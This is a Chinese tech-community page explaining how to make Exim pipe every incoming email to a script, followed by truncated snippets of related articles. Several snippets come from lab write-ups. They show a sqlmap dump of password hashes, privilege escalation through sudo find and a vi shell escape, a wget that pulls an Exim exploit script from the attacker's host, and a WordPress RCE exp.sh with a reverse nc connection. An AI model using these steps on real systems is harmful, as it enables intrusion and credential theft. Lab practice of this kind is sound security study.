首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何将exim配置为为每个电子邮件运行脚本

将exim配置为为每个电子邮件运行脚本的步骤如下:

  1. 确保已安装exim邮件服务器,并具备root权限。
  2. 编辑exim配置文件,通常位于/etc/exim/exim.conf或/etc/exim4/exim.conf。
  3. 在配置文件中找到begin transports部分,并添加以下内容:
代码语言:txt
复制
my_script:
  driver = pipe
  command = /path/to/your/script.sh
  return_path_add
  delivery_date_add
  envelope_to_add
  log_output

其中,my_script是自定义的运输名称,/path/to/your/script.sh是你要运行的脚本的路径。

  1. 在配置文件中找到begin routers部分,并添加以下内容:
代码语言:txt
复制
run_script:
  driver = accept
  transport = my_script
  condition = ${if eq{$local_part_suffix}{}{true}{false}}

这将确保只有当电子邮件没有本地部分后缀时才运行脚本。

  1. 保存并关闭配置文件。
  2. 重新加载exim配置,以使更改生效。可以使用以下命令之一:
  • 对于sysvinit系统:service exim restart
  • 对于systemd系统:systemctl restart exim

现在,当有新的电子邮件到达时,exim将运行指定的脚本。你可以在脚本中处理电子邮件的内容,执行自定义操作,如解析、过滤、存储等。

注意:以上步骤仅适用于exim邮件服务器。对于其他邮件服务器,配置步骤可能会有所不同。

推荐的腾讯云相关产品:腾讯云邮件推送(https://cloud.tencent.com/product/ses)是一种高可用、高性能的电子邮件推送服务,可帮助您快速构建和发送电子邮件。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

  • 0523-5.15-Cloudera Manager配置自定义告警脚本

    1 文档编写目的 Cloudera Manager支持三种方式的告警输出,在前面的文章《如何为CDH集群配置警报邮箱》和《如何通过Cloudera Manager配置使用SNMP方式转发告警》...由于Alert Publisher服务通过自定义告警脚本方式输出的告警内容json格式,为了能够方便的解析 1.在Cloudera Manager服务器上安装JQ命令,用于解析JOSN数据文件 [root...3 自定义告警脚本配置 1.在Alert Publisher服务所在节点创建如下目录,并修改属主 [root@cdh1 ~]# mkdir -p /opt/cloudera/script...4.登录CM进入Cloudera Management Service配置页面,配置自定义告警脚本路径 ? 完成上述配置后,重启Alert Publisher服务即可,不需要重启CMS所有服务。...目录下生成一个临时的告警原始文件,文件内容JSON格式 3.通过自定义告警脚本将原始告警解析后,在脚本中还可以将解析好的告警通过HTTP或其他采集方式将告警上报 4.Fayson在文章中解析JSON格式数据使用到了

    1.9K10

    如何设置tomcat服务自启动_无限自动配置服务没有运行

    跑着 Java Web 应用的 Linux CentOS 服务器,通过镜像的方式更换服务器后站点无法访问,发现是因为 Tomcat 不能在服务器启动后自动启动,于是基于 init.d 将 Tomcat 配置以服务方式自动运行...配置步骤如下: 在 /etc/init.d/ 目录中添加配置文件 tomcat-app 通过 chmod +x tomcat-app 命令将 tomcat-app 设置可执行文件 通过 chkconfig...命令检查是否成功添加到启动服务中 通过 service tomcat-app start 命令测试服务是否可以正常启动 重启服务器验证 tomcat-app 是否可以自动启动 tomcat-app 配置文件内容...配置要点: 注释中一定要添加 chkconfig ,不然添加到启动服务中时会报错 “service xxx does not support chkconfig” 要设置 JAVA_HOME 与 JRE_HOME...环境变量,不然启动服务时会报错 “Neither the JAVA_HOME nor the JRE_HOME environment variable is defined” 具体配置如下: #!

    85030

    格鲁乌的黑暗?揭露Sandworm长达数月的邮件服务器劫持

    最近,外媒报道:俄罗斯军方网络威胁者Sandworm已经利用一个版本的电子邮件服务器漏洞至少数月之久。 ?...事实上,去年5月份,该漏洞已经被披露,漏洞代码CVE-2019-10149,允许远程攻击者在知道该漏洞的情况下执行他们选择的命令和代码。...尽管相关补丁也已发布,但是许多运行Exim的计算机仍没有安装补丁,暴露在攻击威胁之下。 ?...目前,根据NSA的警告,攻击者可以利用该漏洞,在未打补丁的Exim MTA版本中增加特权用户、禁用网络安全设置、执行额外的脚本来进一步利用网络。...尽管还不清楚Sandworm的具体意图,但建议大家立即更新Exim以修复漏洞,梳理流量日志检查是否被利用,而系统管理员可以使用软件包管理器或通过从https://www.exim.org/mirrors.html

    60320

    Linux通过第三方应用提权实战总结

    避免文章篇幅过于冗长,每个应用具体的提权原理就不详细介绍了,感兴趣的自行查阅相关文档) find提权 实例1 一个典型的例子是将SUDO权限分配给find命令,以便其他用户可以在系统中搜索特定的文件相关文件...仔细阅读下41154.sh脚本的内容,具体操作步骤: 把41154.sh的代码分为3个文件; ? ? ? 将两个c文件在本地编译后,上传到靶机下,更改权限后运行; ?...尽管exim配置与sendmail的配置完全不同,但是可以安装Exim代替sendmail。 ?...sudo -l用之前的密码试了不对,发现exim4; 查看exim4当前版本号 /usr/sbin/exim4 —version ? 或者 dpkg -l | grep exim 查看包安装情况 ?...上传脚本;执行后成功; ? vi提权 vi命令分配了root权限 ? 运行sudo -l发现该用户可以任意用户执行vi,按esc后输入:!/bin/bash直接提权至root。

    1.5K20

    每周打靶 | Vulnhub-DC8靶机渗透实战

    靶机可从Vulnhub平台免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag目标!...22和80端口开放 端口服务探测 对相关端口服务进行细致探测 访问页面,又是熟悉的面孔 综上信息搜集可以发现,开放22和80端口,服务器Linux,web中间件Apache,框架为Drupal...写一个python交互 :python -c 'import pty;pty.spawn("/bin/bash")' 提权 使用find命令查找具有suid权限的命令,找到一个exim4命令,exim...是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限 使用searchsploit命令搜索exim相关漏洞 然后把46996.sh拷贝到本地并改名为666.sh,并在kali开启...工具存在suid权限,利用漏洞脚本直接上传运行提权,需要注意的是,提权的时候需要设置编码 set:ff=unix不然会报错

    31630

    如何在Ubuntu 14.04上安装VestaCP并设置网站

    介绍 Vesta控制面板是一个免费的开源网站控制面板,内置网站,电子邮件,数据库和DNS功能。在本教程结束时,我们将在Ubuntu 14.04上安装并运行Vesta,并提供可用的网站和电子邮件帐户。...除非另有说明,否则本教程中的所有命令都应作为具有sudo访问权限的非root用户运行。 第一步 - 安装Vesta 第一步是下载安装脚本。...这包括: Nginx Web服务器 Apache Web Server(作为后端) 绑定DNS服务器 Exim邮件服务器 Dovecot POP3 / IMAP服务器 MySQL数据库服务器 Vsftpd...请注意,无论您在用户名字段中输入都将添加admin_前缀(输入示例将导致admin_ 示例)的内容。 在进行任何您想要的配置后,请务必单击页面底部的“ 添加”。 注意: FTP连接未加密。...如果您想节省磁盘空间或者另一个用户创建帐户,这非常有用。您也可以按下无穷大符号,使其“无限”存储。 Aliases允许您添加转发到该主帐户的其他电子邮件地址。

    1.9K10

    Linux 下的 8 个开源安全工具,再也不怕黑客啦

    因此,我们需要保护我们的Linux系统免受各种形式的威胁,例如可通过多种方式传输的病毒,包括恶意代码,电子邮件附件,恶意URL,仅提及的几个rootkit。...它包含各种程序/脚本,其中包括: chkrootkit - 一个用于检查rootkit修改的系统二进制文件的shell脚本。 ifpromisc.c - 它检查接口是否处于混杂模式。...Comodo反病毒Linux版(CAVL) Comodo是一款功能强大的跨平台防病毒和电子邮件过滤软件。...用于Linux的Comodo Anti-virus可提供强大的病毒防护功能,并具有可完全配置的反垃圾邮件系统的附加功能。...配有扫描计划程序,详细的事件查看器和自定义扫描配置文件。 提供与Postfix,Qmail,Sendmail和Exim MTA兼容的邮件过滤器。 ▌6.

    2.1K20

    Linux下的8个开源安全工具,再也不怕黑客啦

    因此,我们需要保护我们的Linux系统免受各种形式的威胁,例如可通过多种方式传输的病毒,包括恶意代码,电子邮件附件,恶意URL,仅提及的几个rootkit。...它包含各种程序/脚本,其中包括: chkrootkit - 一个用于检查rootkit修改的系统二进制文件的shell脚本。 ifpromisc.c - 它检查接口是否处于混杂模式。...Comodo反病毒Linux版(CAVL) Comodo是一款功能强大的跨平台防病毒和电子邮件过滤软件。...用于Linux的Comodo Anti-virus可提供强大的病毒防护功能,并具有可完全配置的反垃圾邮件系统的附加功能。...配有扫描计划程序,详细的事件查看器和自定义扫描配置文件。 提供与Postfix,Qmail,Sendmail和Exim MTA兼容的邮件过滤器。 6.

    2K01

    如何在Ubuntu 14.04上安装VestaCP并设置网站

    介绍 Vesta控制面板是一个免费的开源网站控制面板,内置网站,电子邮件,数据库和DNS功能。在本教程结束时,我们将在Ubuntu 14.04上安装并运行Vesta,并提供可用的网站和电子邮件帐户。...除非另有说明,否则本教程中的所有命令都应作为具有sudo访问权限的非root用户运行。 第1步 - 安装Vesta 第一步是下载安装脚本。...这包括: Nginx Web服务器 Apache Web Server(作为后端) 绑定DNS服务器 Exim邮件服务器 Dovecot POP3 / IMAP服务器 MySQL数据库服务器 Vsftpd...在进行任何您想要的配置后,请务必单击页面底部的“ 添加”。 注意: FTP连接未加密。通过FTP连接发送的用户名,密码和任何文件都可以被截获和读取。使用唯一密码,不要通过此连接发送敏感文件。...如果您想节省磁盘空间或者另一个用户创建帐户,这非常有用。您也可以按下无穷大符号,使其“无限”存储。 别名允许您添加转发到该主帐户的其他电子邮件地址。 转发允许您输入电子邮件地址以转发所有此电子邮件

    1.9K00

    教程|使用Cloudera机器学习构建集群模型

    另外,我们正在打印每个聚类获得的中心值。 现在,让我们使用此代码段执行实验。...因此,请在此字段中输入值 引擎内核:对于此脚本,您需要选择python3 引擎配置文件:您可以将其保留默认值,也可以选择配置。...您应该在列表顶部看到刚刚运行的实验。 ? 单击“运行ID”以查看每个单独运行的概述。然后点击Build。在此“构建”选项卡上,您可以看到CML该实验构建Docker映像时的实时进度。...作业:一项作业可以自动执行启动引擎、运行脚本、跟踪结果的整个过程、并且可以按您的要求进行配置,使其按定期计划运行,从而减少了人工干预。...在本教程中,我们使用循环计划每5分钟运行一次。选择引擎配置文件以指定每个会话可用的内核数和内存。 ?

    1.4K20

    预警 | 知名邮件代理程序 Exim 远程代码执行漏洞(CVE-2019-10149)

    避免您的业务受影响,云鼎实验室建议使用到 Exim 组件的用户及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。...【风险等级】 高风险 【漏洞风险】 远程代码执行 【漏洞详情】 Exim 是由剑桥大学 Philip Hazel 开发的邮件传输代理,负责邮件的路由,转发和发送,它可运行在绝大多数的类Unix系统上,包括...4.87 版本,直到2019年2月10日发布的4.92 版本才修复了该漏洞,如果用户在 4.87 之前的老版本手工启用了 EXPERIMENTAL_EVENT 配置,则 4.87 之前的老版本用户仍然在受影响范围...➤避免 Exim 服务器被入侵利用,云鼎实验室建议用户: 检查自身 Exim 版本号,查看是否在受影响范围; 如 Exim 4.8.7之前的老版本,建议自查是否手工编译启用了 EXPERIMENTAL_EVENT...配置,如未启用,则不受影响; 如 Exim 较新版本且在受影响范围,建议及时升级更新进行防护。

    75230

    如何在Debian 8上发布Booktype书籍

    Exim配置起来比较复杂,不需要从Booktype发送通知。 第2步 - 安装PDF渲染器(可选) 如果要生成印刷书籍,则需要渲染器将Booktype的HTML章节转换为单个PDF文件。...Booktype实例创建一个目录,例如/var/www/booktype/: sudo mkdir /var/www/booktype/ 确保它由运行Web服务器的www-data用户拥有: sudo...首先,设置系统管理员的名称和电子邮件地址: ADMINS = ( # ('Your Name', 'sammy@example.com'), ) 暂时将活动配置文件设置'dev'来开发: PROFILE_ACTIVE.../booktype-instance1.conf 你应该对配置的服务器和域名ServerAdmin,以管理员的电子邮件地址改变值ServerName和SetEnv HTTP_HOST: <VirtualHost...登录后,与超级用户电子邮件地址关联的gravatar(如果有)将显示在“ 人员”和“ 我的个人资料”框中。 第7步 - 与主管一起运行芹菜 Celery是Booktype服务器使用的任务队列。

    1K00

    vulnhub靶场之DC-8靶场实战(超详细)

    nid=1" --risk=3 --level=5 -D d7db -T users -C name,pass --dump 密码爆破 密码是加密的,其hash值存储txt文件后,使用哈希工具john...是给某个用户或者组授予执行某些命令的权限,权限在人身上 SUID是给命令赋予root用户的权限,权限在命令上 find / -perm -u=s -type f 2>/dev/null 查看exim...的版本 exim4 --version 使用searchsploit 对exim 4.89在漏洞库中查找可利用的漏洞 searchsploit exim 4.89 没有本地提权的漏洞,直接查找exim...可利用的漏洞 searchsploit exim 查看漏洞 下载脚本 切换在/var/www/html,打开apache服务 systemctl start apache2 在shell中下载 wget...http://192.168.111.128/46996.sh 需要切换到/tmp目录,进行下载 当前用户,和用户组权限不高,需要进行提权 chmod 777 46996.sh 查看脚本文件,使用方法

    21110

    Sentry 监控 - 私有 Docker Compose 部署与故障排除详解

    简单起见,我们为此选择使用 Docker 和 Docker Compose, 以及基于 bash 的安装和升级脚本。 入门 我们的建议是下载自托管存储库的最新版本, 然后在此目录中运行 ....这个脚本会处理你开始需要的所有事情,包括一个 base-line 配置, 然后会告诉你运行 docker-compose up -d 来启动 Sentry。 Sentry 默认绑定到端口 9000。...有关更多信息,请参阅配置部分。 出站 Email 自托管 Sentry 附带一个由 exim4 提供支持的内置外发 SMTP server。默认配置设置使用此服务器。...有关每个设置的含义和作用的所有详细信息,请参阅我们的电子邮件服务文档。...您需要在清理脚本之后运行它,并注意它在创建表时,磁盘使用量会在回落之前激增。 下面是一个脚本示例: # Only keep the last 7 days of nodestore data.

    2.9K30

    WordPress 4.6远程代码执行漏洞(CVE-2016-10033)复现环境搭建指南

    dpkg-reconfigure exim4-config 上述命令用来配置 第一个选项选第一个:internet site; mail is sent and received directly using.../exp.sh [http://xx.xx.xx.xx/](http://xx.xx.xx.xx/) 即可 其中xx.xx.xx.xx靶机wordpress的根地址 3.脚本需要修改的部分 rev_host...这三个地方改好了之后,脚本就可以运行了 (里面的一些test和输出是我调的时候自己加的不用在意…) ?...脚本的主要流程: 生成本地rce.txt 里面写的是是建立连接的命令 命令执行第一次 curl攻击机获取rce.txt 写到/tmp目录下 命令执行第二次 运行tmp目录下的rce nc连接靶机 效果不错...,但是局限性较多,比如不能用虚拟机 还有要安装exim4等 这次复现一开始我都在纠结我的wp不能发邮件,还配置SMTP服务器什么的,后来发现其实这不是问题所在, 所以最重要的还是搞清楚到底是需要什么样的验证环境

    2.2K70
    领券